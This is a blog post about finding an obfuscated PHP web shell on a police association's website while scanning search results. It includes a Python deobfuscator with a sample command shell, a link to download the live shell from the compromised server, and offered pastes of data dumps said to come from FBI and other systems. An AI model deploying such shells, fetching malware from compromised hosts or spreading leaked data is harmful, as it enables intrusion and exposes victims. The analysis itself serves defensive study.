Digital Message In a Bottle?

Foreword.

As a programmer I try to automate repetitive tasks: if there is something I have to do often, I usually write a quick script to get it done faster. That includes security-related jobs where possible. With that in mind, a while ago I wrote a tool called DorkNet which, as the name suggests, helps with Google dorking. It takes in a list of dorks and appends the results to a text file, so it is a fast and easy way of cataloguing a large number of websites in a short amount of time based on the criteria (dorks) you provide.

If you are interested in this program, feel free to download it or clone it directly from my repo on GitHub:

git clone https://github.com/NullArray/DorkNet.git

A small investigation.

As I was going over the latest batch of search results I noticed an entry for the website of the Saskatchewan Association of Chiefs of Police. Being related to law enforcement, I imagined the web application would be fairly secure, but since I had my intercepting proxy on anyway I figured I would crawl it, look at some of the responses and so on, and see whether I could find anything interesting regardless, without being intrusive or disruptive.

At some point I came across a page that would not render in the browser but had a large response body. Inspecting the source revealed a variable that had been assigned a very long base64-encoded string, followed by:

;eval(base64_decode($QBDB51E25BF9A7F3D2475072803D1C36D));?>

This indicates that the string is base64-encoded PHP, to be decoded and executed at runtime: the base64 step is only an obfuscation wrapper around whatever code is handed to eval(), and once the assignment is located the payload can be recovered offline without ever running it. My first thought was that we were dealing with a PHP shell, and after decoding the string it became apparent that we were.
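The decoding step described above, as an added example that is not code from the original post: a small Python script that locates the eval(base64_decode($var)) sink, finds the literal assigned to that variable, decodes it, and repeats until no further wrapper is present (packers commonly nest several layers). It then reports web-shell indicators and any URLs embedded in the final plaintext, which is how the author-credit URLs mentioned below would surface. The PHP sample at the bottom is constructed for the example; the variable name mirrors the shape of the one on the page, the inner payload and the URL in it are invented stand-ins and are not the file found on the SACP server.

```python
import base64
import binascii
import re

# Matches the execution sink seen on the page: eval(base64_decode($VAR)).
# Captures the variable name so the matching assignment can be located.
EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)", re.IGNORECASE)

# Strings whose presence in decoded PHP typically indicates a web shell.
SHELL_INDICATORS = (
    "$_GET", "$_POST", "$_REQUEST", "$_COOKIE",
    "system(", "exec(", "shell_exec(", "passthru(", "proc_open(", "popen(",
    "move_uploaded_file(", "base64_decode(", "gzinflate(", "str_rot13(",
)

URL_RE = re.compile(r"https?://[^\s\"'<>()]+")


def find_assignment(src, var):
    """Return the quoted literal assigned to $var in src, or None."""
    pat = re.compile(r"\$" + re.escape(var) + r"\s*=\s*(['\"])(.*?)\1\s*;", re.DOTALL)
    m = pat.search(src)
    return m.group(2) if m else None


def decode_layers(php_source, max_layers=10):
    """Peel nested eval(base64_decode($var)) wrappers.

    Returns the decoded layers, outermost first; the last element is the
    plaintext PHP that would actually run. max_layers bounds the loop so a
    self-referential payload cannot spin forever.
    """
    layers = []
    src = php_source
    for _ in range(max_layers):
        sink = EVAL_RE.search(src)
        if not sink:
            break
        literal = find_assignment(src, sink.group(1))
        if literal is None:
            break
        b64 = re.sub(r"\s+", "", literal)  # tolerate line-wrapped blobs
        try:
            decoded = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break  # not valid base64: stop rather than guess
        layers.append(decoded)
        src = decoded
    return layers


def analyse(php_source):
    """Summarise what the obfuscated file hides: depth, shell indicators, URLs."""
    layers = decode_layers(php_source)
    final = layers[-1] if layers else php_source
    return {
        "layers": len(layers),
        "indicators": sorted(i for i in SHELL_INDICATORS if i in final),
        "urls": sorted(set(URL_RE.findall(final))),
        "final": final,
    }


# --- constructed sample (not the file from the page) ------------------------

def wrap(code, var):
    """Wrap PHP code in one eval(base64_decode($var)) layer, as a packer would."""
    blob = base64.b64encode(code.encode()).decode()
    return f'<?php ${var}="{blob}";eval(base64_decode(${var}));?>'


# Innermost layer: a minimal command shell with an invented author URL in a
# comment, standing in for the kind of payload such blobs turn out to contain.
INNER = (
    '<?php /* constructed sample, see http://example.invalid/shells */\n'
    'if (isset($_REQUEST["c"])) { system($_REQUEST["c"]); }\n'
    '?>'
)
# Two packer layers; the outer variable name is shaped like the one on the page.
SAMPLE = wrap(wrap(INNER, "QAB12"), "QBDB51E25BF9A7F3D2475072803D1C36D")

if __name__ == "__main__":
    r = analyse(SAMPLE)
    print("layers:", r["layers"])
    print("indicators:", r["indicators"])
    print("urls:", r["urls"])
    print(r["final"])
```

Run it against a real file with analyse(open(path).read()); the script never executes the PHP, and validate=True on the base64 decode means a blob that has been tampered with or truncated stops the unwrapping instead of producing garbage that looks like a result.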

(Screenshot: left, the decoded base64; right, the original source.)

Note the URL that is commented into the original source file. Following it, we end up on a small website hosting a collection of shells which one may, it would appear, download and use at leisure. In the decoded payload there is another set of URLs, presumably linking to the websites of the shell's original authors.

If you are interested in looking at the source code for yourself, feel free to wget it from here:

https://www.sacp.ca/news/download_attachment.php?id=16

The plot thickens.

The actor(s) succeeded in compromising their target. Interestingly, they left a data dump behind on the server. As far as I am able to tell, this data originated from three separate sources, possibly unrelated to the main target (the SACP server). Most notably, one part appears to originate from compromised FBI systems. Secondly there is a data dump from what appears to be dukecorperation.com, and lastly an unnamed dump that could be related to the SACP server.

Attribution.

Throughout the text in the data dump there are numerous references to AntiSec and LulzSec, which are loosely affiliated with the Anonymous hacktivist collective. The actor(s) also directly address the FBI on a number of occasions throughout the dump. It would appear to me that this operation was intended to send a message to the FBI.

A Digital Message in a Bottle.

In closing.

If you are interested, I have collected the data and separated it into three pastes according to their presumed origins.

Data Dump #1(FBI)

Data Dump #2(Duke Corp)

Data Dump #3(Potentially SACP)

The complete file can also be found directly on the SACP server.

Please note: All references to AntiSec, are unrelated to @AntiSec_Inc, NullArray, and the Vector pseudonym.